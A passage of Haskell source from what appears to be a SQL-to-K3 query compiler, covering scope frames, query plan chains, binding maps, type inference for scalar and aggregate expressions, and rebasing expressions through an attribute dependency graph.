--   Only unary applications of sum/count/min/max qualify; any other
--   function, arity, or expression form is not an aggregate.
isAggregate :: ScalarExpr -> SQLParseM Bool
isAggregate (FunCall _ nm [_]) = return $ sqlnm nm `elem` ["sum", "count", "min", "max"]
isAggregate _ = return False
-- TODO: qualified identifiers, more expression types
-- | Substitutes bound expressions for identifiers within a scalar
--   expression. Plain identifiers are replaced when present in the
--   bindings; function-call arguments are rewritten recursively;
--   qualified identifiers are rejected; every other expression form is
--   returned unchanged.
substituteExpr :: [(Identifier, ScalarExpr)] -> ScalarExpr -> SQLParseM ScalarExpr
substituteExpr bindings e = case e of
  (Identifier _ (sqlnmcomponent -> i)) -> return $ maybe e id $ lookup i bindings
  (QIdentifier _ _) -> throwE "Cannot substitute qualified expressions."
  (FunCall ann nm args) -> mapM (substituteExpr bindings) args >>= \nargs -> return $ FunCall ann nm nargs
  _ -> return e
{- Scope accessors. -}
attrIds :: AttrEnv -> SQLParseM [Identifier]
attrIds env = mapM (\ptr -> adnn <$> sqglkupM ptr) $ Map.elems env
singletonPath :: AttrPath -> SQLParseM Identifier
singletonPath [i] = return i
singletonPath p = throwE $ "Invalid singleton path: " ++ show p
uniqueScopeQualifier :: ScopeId -> SQLParseM Identifier
uniqueScopeQualifier sid = do
(_, _, quals) <- sqclkupM sid
case quals of
[[q]] -> return q
_ -> throwE $ "Invalid unique scope qualifier: " ++ show quals
unqualifiedAttrs :: ScopeFrame -> SQLParseM [Identifier]
unqualifiedAttrs (_, ord, _) = forM ord $ singletonPath
qualifiedAttrs :: AttrPath -> ScopeFrame -> SQLParseM AttrEnv
qualifiedAttrs prefix (fr, _, q)
| prefix `elem` q = return $ Map.filterWithKey (\path _ -> prefix `isPrefixOf` path) fr
| otherwise = throwE $ unwords ["Could not find qualifier:", show prefix, "(", show q, ")"]
partitionAttrEnv :: ScopeFrame -> SQLParseM (AttrEnv, AttrEnv)
partitionAttrEnv (fr,_,_) = return $ Map.partitionWithKey (\path _ -> length path <= 1) fr
partitionCommonQualifedAttrEnv :: ScopeFrame -> SQLParseM (Map AttrPath AttrEnv)
partitionCommonQualifedAttrEnv (fr, ord, _) = return $ Map.foldlWithKey (addQualifiedCommon ord) Map.empty fr
where
addQualifiedCommon commons acc path ptr
| length path <= 1 = acc
| otherwise =
let (qual, attr) = (init path, last path) in
if [attr] `notElem` commons then acc else Map.alter (inject [attr] ptr) qual acc
inject path ptr Nothing = Just $ Map.singleton path ptr
inject path ptr (Just aenv) = Just $ Map.insert path ptr aenv
unqualifiedScopeFrame :: ScopeFrame -> SQLParseM ScopeFrame
unqualifiedScopeFrame (fr, ord, _)
| all (\path -> length path == 1) ord = return (Map.filterWithKey (\path _ -> length path == 1) fr, ord, [])
| otherwise = throwE "Unable to extract unqualified scope (lossy order specification)"
qualifiedScopeFrame :: ScopeFrame -> SQLParseM ScopeFrame
qualifiedScopeFrame (fr, _, q) = return (Map.filterWithKey (\path _ -> length path > 1) fr, [], q)
renameScopeFrame :: Identifier -> ScopeFrame -> SQLParseM ScopeFrame
renameScopeFrame i sf = do
(ufr, ord, _) <- unqualifiedScopeFrame sf
return (ufr <> Map.mapKeys (\path -> [i] ++ path) ufr, ord, [[i]])
concatScopeFrames :: ScopeFrame -> ScopeFrame -> SQLParseM ScopeFrame
concatScopeFrames (lfr,lord,lq) (rfr,rord,rq) = return (lfr <> rfr, lord ++ rord, lq++rq)
mergeScopeFrames :: ScopeFrame -> ScopeFrame -> SQLParseM ScopeFrame
mergeScopeFrames lsf@(_, lord, lquals) rsf@(_, rord, rquals) = do
let common = lord `intersect` rord
let nord = (nub $ lord ++ rord) \\ common
((lu,lq), (ru,rq)) <- (,) <$> partitionAttrEnv lsf <*> partitionAttrEnv rsf
let nu = (foldl (flip Map.delete) lu common) <> (foldl (flip Map.delete) ru common)
return (nu <> lq <> rq, nord, lquals ++ rquals)
mergeScopes :: ScopeId -> ScopeId -> SQLParseM ScopeId
mergeScopes id1 id2 = do
(lsf, rsf) <- (,) <$> sqclkupM id1 <*> sqclkupM id2
nsf <- mergeScopeFrames lsf rsf
sqcpushM nsf
outputTypeAndQualifier :: K3 Type -> Identifier -> Maybe TableAlias -> SQLParseM (K3 Type, Maybe Identifier)
outputTypeAndQualifier t pfx alOpt = do
sym <- sasextM
case alOpt of
Nothing -> return (t, Just $ pfx ++ show sym)
Just al -> (,) <$> taliascolM al t <*> return (sqltablealias (pfx ++ show sym) al)
typedOutputScope :: K3 Type -> Identifier -> Maybe TableAlias -> SQLParseM ScopeId
typedOutputScope t pfx alOpt = do
(rt, tid) <- outputTypeAndQualifier t pfx alOpt
sqgextSchemaM tid rt
outputScope :: ScopeId -> Identifier -> Maybe TableAlias -> SQLParseM ScopeId
outputScope sid pfx alOpt = do
t <- scopeType sid
typedOutputScope t pfx alOpt
aliasedOutputScope :: ScopeId -> Identifier -> Maybe TableAlias -> SQLParseM ScopeId
aliasedOutputScope sid pfx alOpt = do
(t, ptrs) <- (,) <$> scopeType sid <*> sqcfptrsM sid
(rt, tid) <- outputTypeAndQualifier t pfx alOpt
sqgextAliasM tid rt ptrs
-- | Builds an output scope for a list of named, typed expressions, under a
--   freshly generated qualifier.
exprOutputScope :: ScopeId -> Identifier -> [(Identifier, K3 Type, ScalarExpr)] -> SQLParseM ScopeId
exprOutputScope sid pfx exprs = do
  freshSym <- sasextM
  sqgextExprM sid (Just $ pfx ++ show freshSym) exprs
{- Binding map helpers. -}

-- | The default binding map for collection elements: fields are addressed
--   through the "elem" record prefix.
bmelem :: BindingMap
bmelem = BMTPrefix "elem"
{- Query plan accessors. -}

-- | Returns the node label at the root of a plan tree.
ttag :: PlanTree -> PlanNode
ttag (Node tg _) = tg

-- | Replaces a tree node's label, keeping its children.
replaceData :: Tree a -> a -> Tree a
replaceData (Node _ ch) n = Node n ch
-- | True for join nodes that carry at least one equality conjunct and no
--   residual (non-equality) predicates.
isEquiJoin :: PlanTree -> Bool
isEquiJoin (ttag -> PJoin _ _ _ (_:_) [] _ _) = True
isEquiJoin _ = False

-- | True for any join node.
isJoin :: PlanTree -> Bool
isJoin (ttag -> PJoin _ _ _ _ _ _ _) = True
isJoin _ = False
{- Path/chain accessors. -}

-- | Attempts to resolve an attribute path in an optional scope: runs the
--   failure action when no scope is supplied or the lookup misses, and the
--   success continuation on the resolved attribute pointer otherwise.
trypath :: Maybe ScopeId -> SQLParseM a -> (ADGPtr -> SQLParseM a) -> AttrPath -> SQLParseM a
trypath sidOpt rfail rsuccess path = (\f -> maybe rfail f sidOpt) $ \sid -> do
  pOpt <- sqcftrylkupM sid path
  maybe rfail rsuccess pOpt
-- | A chain path with no group-by expressions and no projections is a
--   pure-aggregate path.
isAggregatePath :: PlanCPath -> Bool
isAggregatePath (PlanCPath _ _ [] [] _ _ _) = True
isAggregatePath _ = False

-- | A chain path carrying both group-by expressions and aggregates.
isGroupByAggregatePath :: PlanCPath -> Bool
isGroupByAggregatePath (PlanCPath _ _ (_:_) _ (_:_) _ _) = True
isGroupByAggregatePath _ = False

-- | A chain path with no group-bys, no aggregates and no having clause.
isNonAggregatePath :: PlanCPath -> Bool
isNonAggregatePath (PlanCPath _ _ [] _ [] Nothing _) = True
isNonAggregatePath _ = False
-- | Returns the computation chains attached to a plan node, descending into
--   subquery closures for subquery nodes.
planNodeChains :: PlanNode -> Maybe [PlanCPath]
planNodeChains (PJoin _ _ _ _ _ _ chains) = Just chains
planNodeChains (PTable _ _ _ _ chains) = Just chains
planNodeChains (PSubquery _ qcl) = queryClosureChains qcl

-- | Chains attached to a plan tree's root node.
treeChains :: PlanTree -> Maybe [PlanCPath]
treeChains (Node n _) = planNodeChains n
-- | Returns the computation chains of a query plan. Non-empty top-level
--   chains take precedence; otherwise the chains are drawn from the plan's
--   join tree, when one is present.
queryPlanChains :: QueryPlan -> Maybe [PlanCPath]
queryPlanChains (QueryPlan tOpt chains _) =
  -- `maybe Nothing treeChains tOpt` is exactly bind in the Maybe monad.
  if null chains then tOpt >>= treeChains else Just chains
-- | Chains of the plan carried by a query closure.
queryClosureChains :: QueryClosure -> Maybe [PlanCPath]
queryClosureChains qcl = queryPlanChains $ qcplan qcl
-- | Appends a computation path to the chains of a plan tree's root node,
--   recurring through subquery closures to reach their underlying plans.
pcext :: PlanCPath -> PlanTree -> SQLParseM PlanTree
pcext p (Node n ch) = case n of
  PJoin psid osid jt jeq jp jpb chains -> return $ Node (PJoin psid osid jt jeq jp jpb $ chains ++ [p]) ch
  PTable i tsid trOpt bmOpt chains -> return $ Node (PTable i tsid trOpt bmOpt $ chains ++ [p]) ch
  PSubquery osid qcl -> pcextclosure p qcl >>= \nqcl -> return $ Node (PSubquery osid nqcl) ch
  where pcextclosure p (QueryClosure fvs plan) = pcextplan p plan >>= \nplan -> return $ QueryClosure fvs nplan
        pcextplan p (QueryPlan tOpt chains stgOpt) = return $ QueryPlan tOpt (chains ++ [p]) stgOpt
-- | Adds a selection predicate (and its subquery bindings) to the last path
--   of a chain, creating a fresh path when the chain is empty.
pcextSelect :: ScopeId -> SubqueryBindings -> ScalarExpr -> [PlanCPath] -> [PlanCPath]
pcextSelect sid qbs p [] = [PlanCPath sid [p] [] [] [] Nothing qbs]
pcextSelect _ qbs p pcl =
  let lastPath = last pcl
      extended = lastPath { pcselects  = pcselects lastPath ++ [p]
                          , pcbindings = pcbindings lastPath ++ qbs }
  in init pcl ++ [extended]
-- | Appends a group-by/aggregate computation path to a plan node's chains,
--   computing the aggregate output schema from the node's current chain
--   schema. Subquery nodes are extended through their closure's plan.
pcextGroupBy :: SelectItemList -> SelectItemList -> PlanNode -> SQLParseM PlanNode
pcextGroupBy gbs aggs n@(PJoin _ osid _ _ _ _ chains) = do
  aggsid <- aggregateSchema (Just $ chainSchema osid chains) gbs aggs
  return $ n { pnjpath = chains ++ [PlanCPath aggsid [] (projectionexprs gbs) gbs aggs Nothing []] }
pcextGroupBy gbs aggs n@(PTable _ sid _ _ chains) = do
  aggsid <- aggregateSchema (Just $ chainSchema sid chains) gbs aggs
  return $ n { pntpath = chains ++ [PlanCPath aggsid [] (projectionexprs gbs) gbs aggs Nothing []] }
pcextGroupBy gbs aggs n@(PSubquery _ qcl) = extPlan (qcplan qcl) >>= \p -> return $ n { pnqclosure = qcl { qcplan = p } }
  where extPlan p@(QueryPlan tOpt chains stgOpt) = do
          sid <- planSchema p
          aggsid <- aggregateSchema (Just sid) gbs aggs
          return $ QueryPlan tOpt (chains ++ [PlanCPath aggsid [] (projectionexprs gbs) gbs aggs Nothing []]) stgOpt
-- | Threads scopes through a chain, pairing each path's input scope with its
--   non-aggregate expressions (selections, group-bys, projections).
pcNonAggExprs :: ScopeId -> [PlanCPath] -> [(ScopeId, ScalarExprList)]
pcNonAggExprs _ [] = []
pcNonAggExprs sid (h:t) = snd $ foldl accum (pcoutsid h, [extract sid h]) t
  where accum (sid', expracc) pcp = (pcoutsid pcp, expracc ++ [extract sid' pcp])
        extract sid' (PlanCPath _ selects groupbys projects _ _ _) = (sid', selects ++ groupbys ++ projectionexprs projects)

-- | As 'pcNonAggExprs', but pairing each path's input scope with its
--   aggregate expressions.
pcAggExprs :: ScopeId -> [PlanCPath] -> [(ScopeId, ScalarExprList)]
pcAggExprs _ [] = []
pcAggExprs sid (h:t) = snd $ foldl accum (pcoutsid h, [extract sid h]) t
  where accum (sid', expracc) pcp = (pcoutsid pcp, expracc ++ [extract sid' pcp])
        extract sid' (PlanCPath _ _ _ _ aggs _ _) = (sid', projectionexprs aggs)
-- | The output scope of a chain: the last path's output scope, or the input
--   scope when the chain is empty.
chainSchema :: ScopeId -> [PlanCPath] -> ScopeId
chainSchema sid []     = sid
chainSchema _   chains = pcoutsid $ last chains
-- | The output scope of a plan tree's root node, accounting for any attached
--   computation chains.
treeSchema :: PlanTree -> SQLParseM ScopeId
treeSchema (ttag -> PJoin _ sid _ _ _ _ chains) = return $ chainSchema sid chains
treeSchema (ttag -> PSubquery sid _) = return sid
treeSchema (ttag -> PTable _ sid _ _ chains) = return $ chainSchema sid chains
treeSchema _ = throwE "Invalid plan node input for treeSchema"
-- | The output scope of a query plan: the last top-level chain's scope when
--   chains are present, otherwise the join tree's schema.
planSchema :: QueryPlan -> SQLParseM ScopeId
planSchema (QueryPlan Nothing [] _) = throwE "Invalid query plan with no tables or expressions"
planSchema (QueryPlan (Just t) [] _) = treeSchema t
planSchema (QueryPlan _ chains _) = return $ pcoutsid $ last chains
-- | Builds the output scope of a group-by/aggregate stage from its
--   projection and aggregate select items. With no items the input scope is
--   returned unchanged; with no input scope a fresh schema is synthesized
--   from the items' inferred types.
aggregateSchema :: Maybe ScopeId -> SelectItemList -> SelectItemList -> SQLParseM ScopeId
aggregateSchema (Just sid) [] [] = return sid
aggregateSchema sidOpt projects aggregates = do
  let pexprs = projectionexprs projects
  let aexprs = projectionexprs aggregates
  -- A single anonymous-name counter is threaded across both item lists.
  (prji, prjids) <- foldM selectItemIdAcc (0, []) projects
  (_, aggids) <- foldM selectItemIdAcc (prji, []) aggregates
  prjt <- mapM (scalarexprType sidOpt) pexprs
  aggt <- mapM (aggregateType sidOpt) aexprs
  case sidOpt of
    Nothing -> typedOutputScope (recT $ zip prjids prjt ++ zip aggids aggt) "__RN" Nothing
    Just sid -> exprOutputScope sid "__AGG" $ (zip3 prjids prjt pexprs) ++ (zip3 aggids aggt aexprs)
-- | Recomputes a join node's input and output scopes from its (possibly
--   rewritten) children. Leaf nodes are returned unchanged; any other shape
--   is invalid.
refreshInputSchema :: PlanNode -> [PlanTree] -> SQLParseM PlanNode
refreshInputSchema (PJoin _ _ jt jeq jp jpb chains) [l,r] = do
  (lsid, rsid) <- (,) <$> treeSchema l <*> treeSchema r
  jpsid <- mergeScopes lsid rsid
  josid <- outputScope jpsid "__JR" Nothing
  return $ PJoin jpsid josid jt jeq jp jpb chains
refreshInputSchema n [] = return n
refreshInputSchema _ _ = throwE "Invalid plan tree node for refreshInputSchema"
-- | Reconstructs the K3 collection type of a scope from its unqualified
--   attributes, preserving the frame's attribute order.
scopeType :: ScopeId -> SQLParseM (K3 Type)
scopeType sid = do
  sf@(_, ord, _) <- sqclkupM sid >>= unqualifiedScopeFrame
  ptrs <- mapM (\path -> liftExceptM $ sflkup sf path) ord
  nodes <- mapM sqglkupM ptrs
  tcolM $ recT $ map (adnn &&& adnt) nodes
-- | Computes the K3 collection type of a scope as seen through a binding
--   map, which determines how the scope's record fields are nested: no
--   nesting (BMNone), a single wrapper field (BMTPrefix), or per-field
--   target paths (BMTFieldMap). Partitioned bindings are unsupported here.
k3ScopeType :: ScopeId -> BindingMap -> SQLParseM (K3 Type)
k3ScopeType sid bm = do
  t <- scopeType sid
  rt <- telemM t
  case (tnc rt, bm) of
    ((TRecord ids, ch), BMNone) -> return t
    ((TRecord ids, ch), BMTPrefix j) -> tcolM $ recT [(j,rt)]
    ((TRecord ids, ch), BMTFieldMap fb) -> namedRecordT fb (zip ids ch) >>= tcolM
    ((TRecord ids, ch), BMTVPartition pb) -> throwE "BMTVPartition mapping unsupported in k3ScopeType"
    _ -> throwE "Invalid k3ScopeType element type"
  where
    -- Builds a record type by placing each field at its mapped target path.
    namedRecordT fb idt = foldM (field fb) [] idt >>= return . recT
    field fb acc (j,t) = maybe (err j) (extendNestedRecord t acc) $ Map.lookup j fb
    -- Inserts a type at a (possibly nested) path, creating or extending
    -- intermediate record fields as needed.
    extendNestedRecord _ fieldsAcc [] = throwE "Invalid nested record extension"
    extendNestedRecord t fieldsAcc [i] = return $ fieldsAcc ++ [(i,t)]
    extendNestedRecord t fieldsAcc (h:rest) =
      case lookup h fieldsAcc of
        Nothing -> do
          subfields <- extendNestedRecord t [] rest
          return $ fieldsAcc ++ [(h, recT subfields)]
        Just (tnc -> (TRecord ids, tch)) -> do
          subfields <- extendNestedRecord t (zip ids tch) rest
          return $ map (replaceField h $ recT subfields) fieldsAcc
        Just _ -> throwE $ "Existing non-record field when attempting to extend nested record"
    replaceField dst nt (src,t) | src == dst = (dst, nt)
                                | otherwise = (src, t)
    err j = throwE $ "No field binding found in namedRecordT for " ++ show j
-- | Computes the K3 type of a query plan's result. Plans whose final chain
--   path is a pure aggregate yield the aggregate's zero/accumulator record
--   type rather than a collection type.
k3PlanType :: BindingMap -> QueryPlan -> SQLParseM (K3 Type)
k3PlanType _ (QueryPlan Nothing [] _) = throwE "Invalid query plan with no tables or expressions"
k3PlanType bm p = do
  sid <- planSchema p
  case queryPlanChains p of
    Just [] -> k3ScopeType sid bm
    Just l | isAggregatePath (last l) -> do
      t <- k3ScopeType sid bm
      rt <- telemM t
      case tnc rt of
        (TRecord ids, ch) -> zeroT $ zip ids ch
        _ -> throwE "Invalid k3 aggregate plan type"
    _ -> k3ScopeType sid bm
-- TODO:
-- i. builtin function types
-- ii. AST: AggregateFn, Extract, Interval, LiftOperator, NullLit, Placeholder, PositionalArg, WindowFn
-- | Infers the K3 type of a SQL scalar expression, resolving identifiers
--   against the given scope when one is provided. Unresolvable identifiers
--   fall back to TC.bottom (with a debug trace) rather than failing.
scalarexprType :: Maybe ScopeId -> ScalarExpr -> SQLParseM (K3 Type)
scalarexprType _ (BooleanLit _ _) = return TC.bool
scalarexprType _ (StringLit _ _) = return TC.string
-- A numeric literal containing a decimal point is real; otherwise int.
scalarexprType _ (NumberLit _ i) = return $ if "." `isInfixOf` i then TC.real else TC.int
scalarexprType _ (TypedStringLit _ tn _) = sqlnamedtype tn
scalarexprType _ (Cast _ _ tn) = sqlnamedtype tn
scalarexprType sidOpt (Identifier _ (sqlnmcomponent -> i)) = do
  sf <- maybe (return Nothing) (\i -> sqclkupM i >>= return . Just) sidOpt
  trypath sidOpt (trace (unwords ["bottom", i, show sidOpt, show sf]) $ return TC.bottom) (\ptr -> sqglkupM ptr >>= return . adnt) [i]
scalarexprType sidOpt (QIdentifier _ (sqlnmpath -> path)) = do
  sf <- maybe (return Nothing) (\i -> sqclkupM i >>= return . Just) sidOpt
  trypath sidOpt (trace (unwords ["bottom", show path, show sidOpt, show sf]) $ return TC.bottom) (\ptr -> sqglkupM ptr >>= return . adnt) path
-- Case expressions take the type of the else branch when present, otherwise
-- of the first when-branch result.
scalarexprType sidOpt (Case _ whens elseexpr) = maybe (caselistType sidOpt whens) (scalarexprType sidOpt) elseexpr
scalarexprType sidOpt (CaseSimple _ expr whens elseexpr) = maybe (caselistType sidOpt whens) (scalarexprType sidOpt) elseexpr
scalarexprType sidOpt (FunCall _ nm args) = do
  let fn = sqlnm nm
  case sqloperator fn args of
    (Just (UnaryOp _ x)) -> scalarexprType sidOpt x
    -- Binary operators require both operand types to agree.
    (Just (BinaryOp _ x y)) -> do
      xt <- scalarexprType sidOpt x
      yt <- scalarexprType sidOpt y
      if xt == yt then return xt
      else throwE $ boxToString $ ["Binary operator sql type mismatch"]
                      %$ prettyLines xt %$ prettyLines yt
    _ -> do
      case (fn, args) of
        ("!between", [_,_,_]) -> return TC.bool
        ("!like", [_,_]) -> return TC.bool
        ("!notlike", [_,_]) -> return TC.bool
        (_, _) -> throwE $ "Unsupported function in scalarexprType: " ++ fn
scalarexprType (Just sid) (Star _) = scopeType sid >>= telemM
-- Qualified star: the record of all attributes under the given qualifier.
scalarexprType (Just sid) (QStar _ (sqlnmcomponent -> n)) = do
  (fr,_,_) <- sqclkupM sid
  let ptrs = Map.elems $ Map.filterWithKey (\k _ -> [n] `isPrefixOf` k) fr
  idt <- mapM (\p -> sqglkupM p >>= return . (adnn &&& adnt)) ptrs
  return $ recT idt
scalarexprType _ (ScalarSubQuery _ _) = return TC.bool -- TODO: return subquery type, not bool!
scalarexprType _ (Exists _ _) = return TC.bool
scalarexprType _ (InPredicate _ _ _ _) = return TC.bool
scalarexprType _ e = throwE $ "Type inference unsupported for: " ++ show e
-- | The type of a case-branch list, taken from its first branch's result.
caselistType :: Maybe ScopeId -> [([ScalarExpr], ScalarExpr)] -> SQLParseM (K3 Type)
caselistType _ [] = throwE $ "Invalid empty case-list in caselistType"
caselistType sidOpt ((_, firstResult):_) = scalarexprType sidOpt firstResult
-- | Infers the K3 type of a SQL aggregate call: 'sum', 'min' and 'max' take
--   the type of their argument expression, while 'count' is always integer.
--   Any other expression is rejected.
aggregateType :: Maybe ScopeId -> ScalarExpr -> SQLParseM (K3 Type)
aggregateType sidOpt agg@(FunCall _ nm args) = do
  let fn = sqlnm nm
  case (fn, args) of
    ("sum"  , [e]) -> scalarexprType sidOpt e
    -- count's argument type is irrelevant; bind it with a wildcard.
    ("count", [_]) -> return TC.int
    ("min"  , [e]) -> scalarexprType sidOpt e
    ("max"  , [e]) -> scalarexprType sidOpt e
    (_, _)         -> throwE $ "Invalid aggregate expression: " ++ show agg
aggregateType _ agg = throwE $ "Invalid aggregate expression: " ++ show agg
-- | Computes a column identifier for a select item, threading a counter used
--   only to name anonymous expressions ("f<i>"); named items do not consume
--   the counter.
selectItemId :: Int -> SelectItem -> SQLParseM (Int, Identifier)
selectItemId i (SelExp _ (Identifier _ (Nmc n))) = return (i, n)
selectItemId i (SelExp _ _) = return (i+1, "f" ++ show i)
selectItemId i (SelectItem _ _ (sqlnmcomponent -> n)) = return (i, n)
-- | Accumulating variant of 'selectItemId': appends each item's identifier
--   to the list while threading the anonymous-name counter.
selectItemIdAcc :: (Int, [Identifier]) -> SelectItem -> SQLParseM (Int, [Identifier])
selectItemIdAcc (i, acc) (SelExp _ (Identifier _ (Nmc n))) = return (i, acc ++ [n])
selectItemIdAcc (i, acc) (SelExp _ _) = return (i+1, acc ++ ["f" ++ show i])
selectItemIdAcc (i, acc) (SelectItem _ _ (sqlnmcomponent -> n)) = return (i, acc ++ [n])
-- | Join outputs are addressed through the "elem" prefix; all other plan
--   nodes need no binding map.
nodeBindingMap :: PlanNode -> SQLParseM BindingMap
nodeBindingMap n = case n of
  PJoin _ _ _ _ _ _ _ -> return bmelem
  _                   -> return BMNone
-- | Binding map for a chain path. Plain selection/projection paths use the
--   element prefix; group-by/aggregate paths map projections under "key"
--   and aggregates under "value", flattening singleton field lists.
chainBindingMap :: PlanCPath -> SQLParseM BindingMap
chainBindingMap (PlanCPath _ _ gbs prjs aggs _ _)
  | null gbs && null aggs = return bmelem
  | otherwise = do
    (prji, prjids) <- foldM selectItemIdAcc (0, []) prjs
    (_, aggids) <- foldM selectItemIdAcc (prji, []) aggs
    let (nidx, keyPaths) = prefixTypePath (0::Int) "key" prjids
    let (_, valPaths) = prefixTypePath nidx "value" aggids
    return $ BMTFieldMap $ Map.fromList $ keyPaths ++ valPaths
  where prefixTypePath i pfx l = case l of
          -- No fields: synthesize a placeholder name bound to the bare prefix.
          [] -> (i+1, [("f" ++ show i, [pfx])])
          -- A single field binds directly to the prefix.
          [j] -> (i, [(j, [pfx])])
          -- Multiple fields nest under the prefix.
          _ -> (i, map (\j -> (j, [pfx, j])) l)
-- | Binding map for a plan tree: derived from the last chain path when one
--   exists, otherwise from the root node itself.
treeBindingMap :: PlanTree -> SQLParseM BindingMap
treeBindingMap t = case treeChains t of
  Just cps@(_:_) -> chainBindingMap $ last cps
  _              -> nodeBindingMap $ ttag t
-- | Binding map for a query plan: from its last top-level chain when
--   present, otherwise from its join tree. A plan with neither is invalid.
planBindingMap :: QueryPlan -> SQLParseM BindingMap
planBindingMap (QueryPlan tOpt chains _) = case (chains, tOpt) of
  ([], Nothing) -> throwE "Invalid query plan with empty tree and chains"
  ([], Just t)  -> treeBindingMap t
  (cs, _)       -> chainBindingMap $ last cs
-- | True when a type path starts with the "key" or "value" component.
keyValuePrefix :: TypePath -> Bool
keyValuePrefix tp = any (\pfx -> [pfx] `isPrefixOf` tp) ["key", "value"]
-- | True when a type mapping targets the key/value structure, whether given
--   as a bare prefix or as a full type path.
keyValueMapping :: TypeMapping -> Bool
keyValueMapping Nothing = False
keyValueMapping (Just m) = either (`elem` ["key", "value"]) keyValuePrefix m
-- | Checks whether every target of a binding map lies under key/value.
isKVBindingMap :: BindingMap -> SQLParseM Bool
isKVBindingMap (BMTFieldMap fields) = return $ all keyValuePrefix $ Map.elems fields
isKVBindingMap (BMTVPartition partitions) = return $ all (keyValueMapping . snd) $ Map.elems partitions
isKVBindingMap _ = return False
{- Rewriting helpers. -}
-- TODO: case, etc.
-- This function does not descend into subqueries.
-- However, it should include free variables present in the subquery, and defined in
-- the given scope.
-- | Returns the attribute pointers referenced by a scalar expression in the
--   given scope. Function arguments are traversed; subqueries are not
--   descended into, and all other expression forms contribute no pointers.
exprAttrs :: ScopeId -> ScalarExpr -> SQLParseM [ADGPtr]
exprAttrs sid e = case e of
  (Identifier _ (sqlnmcomponent -> i)) -> sqcflkupM sid [i] >>= return . (:[])
  (QIdentifier _ (sqlnmpath -> path)) -> sqcflkupM sid path >>= return . (:[])
  (FunCall _ _ args) -> mapM (exprAttrs sid) args >>= return . concat
  _ -> return []
-- | Returns the distinct attribute pointers bound in a scope frame's
--   attribute environment.
attrEnvPtrs :: ScopeFrame -> [ADGPtr]
attrEnvPtrs (fr, _, _) = nub $ Map.elems fr
-- | Chases a given attribute pointer to the provided roots (or its set of
--   source nodes if no roots are given), returning the terminal
--   pointer/node pairs. The visited path cuts cycles.
adgchaseM :: [ADGPtr] -> ADGPtr -> SQLParseM [(ADGPtr, ADGNode)]
adgchaseM roots ptr = sqglkupM ptr >>= \n -> chase [] ptr n
  where chase path p n
          | p `elem` path || p `elem` roots = return [(p, n)]
          | null (adnch n) = return [(p, n)]
          | otherwise = mapM (\c -> sqglkupM c >>= chase (path ++ [p]) c) (adnch n) >>= return . concat
-- | Rewrites an expression by repeatedly substituting its attribute
--   references with their defining expressions, stopping at the given root
--   pointers (and at pointers already visited).
adgchaseExprM :: [ADGPtr] -> ScopeId -> ScalarExpr -> SQLParseM ScalarExpr
adgchaseExprM roots sid expression = exprAttrs sid expression >>= \ptrs -> chase [] expression ptrs
  where chase path e ptrs = do
          let remptrs = filter (\p -> p `notElem` roots && p `notElem` path) ptrs
          if null remptrs
            then return e
            else do
              nodes <- mapM sqglkupM remptrs
              -- Substitution environment: attribute name -> defining expression.
              let env = concatMap (\(i,eOpt) -> maybe [] (\e' -> [(i,e')]) eOpt) $ map (adnn &&& adne) nodes
              ne <- substituteExpr env e
              chase (path ++ remptrs) ne $ concatMap adnch nodes
-- | Returns the set of nodes visited during a chase on a given list of
--   roots and a starting pointer (the start node included in the result).
adgchaseNodesM :: [ADGPtr] -> ADGPtr -> SQLParseM [(ADGPtr, ADGNode)]
adgchaseNodesM roots ptr = sqglkupM ptr >>= \node -> chase [(ptr,node)] [] ptr node
  where chase acc path p n
          | p `elem` path || p `elem` roots || null (adnch n) = return acc
          | otherwise = foldM (rcr p path) acc (adnch n)
        rcr p path acc cp = sqglkupM cp >>= \cn -> chase (acc ++ [(cp,cn)]) (path ++ [p]) cp cn
-- | Names of the base relations reachable from an attribute pointer.
baseRelationsP :: ADGPtr -> SQLParseM [Identifier]
baseRelationsP ptr = do
  visited <- adgchaseM [] ptr
  return $ nub $ catMaybes $ map (adnr . snd) visited
-- | Names of the base relations underlying an expression's attributes.
baseRelationsE :: ScopeId -> ScalarExpr -> SQLParseM [Identifier]
baseRelationsE sid expression = do
  ptrs <- exprAttrs sid expression
  chased <- mapM (adgchaseM []) ptrs
  return $ nub $ catMaybes $ map (adnr . snd) $ concat chased
-- | Names of the base relations underlying all attributes of a scope.
baseRelationsS :: ScopeId -> SQLParseM [Identifier]
baseRelationsS sid = do
  ptrs <- sqcfptrsM sid
  chased <- mapM (adgchaseM []) ptrs
  return $ nub $ catMaybes $ map (adnr . snd) $ concat chased
-- | Rewrites attribute pointers in terms of the given root pointers.
rebaseAttrsToRoots :: [ADGPtr] -> [ADGPtr] -> SQLParseM [ADGPtr]
rebaseAttrsToRoots roots ptrs = do
  chased <- mapM (adgchaseM roots) ptrs
  return $ nub $ map fst $ concat chased
-- | Rewrites attribute pointers in terms of a scope's bound pointers.
rebaseAttrs :: ScopeId -> [ADGPtr] -> SQLParseM [ADGPtr]
rebaseAttrs sid ptrs = do
  fr <- sqclkupM sid
  rebaseAttrsToRoots (attrEnvPtrs fr) ptrs
-- | Rewrites expressions by chasing their attributes back to the given
--   root pointers.
rebaseExprsToRoots :: ScopeId -> [ADGPtr] -> ScalarExprList -> SQLParseM ScalarExprList
rebaseExprsToRoots sid roots exprs = mapM (adgchaseExprM roots sid) exprs
-- | Rewrites expressions from a source scope in terms of the attributes
--   bound by the given destination scopes.
rebaseExprs :: ScopeId -> [ScopeId] -> ScalarExprList -> SQLParseM ScalarExprList
rebaseExprs ssid dsidl exprs = do
  frames <- mapM sqclkupM dsidl
  rebaseExprsToRoots ssid (nub $ concatMap attrEnvPtrs frames) exprs
-- | Rewrites each select item's expression against the given root pointers,
--   preserving annotations and column names.
rebaseSelectItemsToRoots :: ScopeId -> [ADGPtr] -> SelectItemList -> SQLParseM SelectItemList
rebaseSelectItemsToRoots ssid roots items = mapM rebase items
  where rebase si = case si of
          SelExp ann e         -> SelExp ann <$> adgchaseExprM roots ssid e
          SelectItem ann e nmc -> (\ne -> SelectItem ann ne nmc) <$> adgchaseExprM roots ssid e
-- | Rewrites select items from a source scope in terms of the attributes
--   bound by the given destination scopes.
rebaseSelectItems :: ScopeId -> [ScopeId] -> SelectItemList -> SQLParseM SelectItemList
rebaseSelectItems ssid dsidl items = do
  frames <- mapM sqclkupM dsidl
  rebaseSelectItemsToRoots ssid (nub $ concatMap attrEnvPtrs frames) items
-- | Partitions expressions by which join input can evaluate them: those
--   whose (rebased) attributes all come from the left scope, all from the
--   right scope, or neither (spanning both inputs).
localizeInputExprs :: ScopeId -> ScopeId -> ScopeId -> ScalarExprList -> SQLParseM (ScalarExprList, ScalarExprList, ScalarExprList)
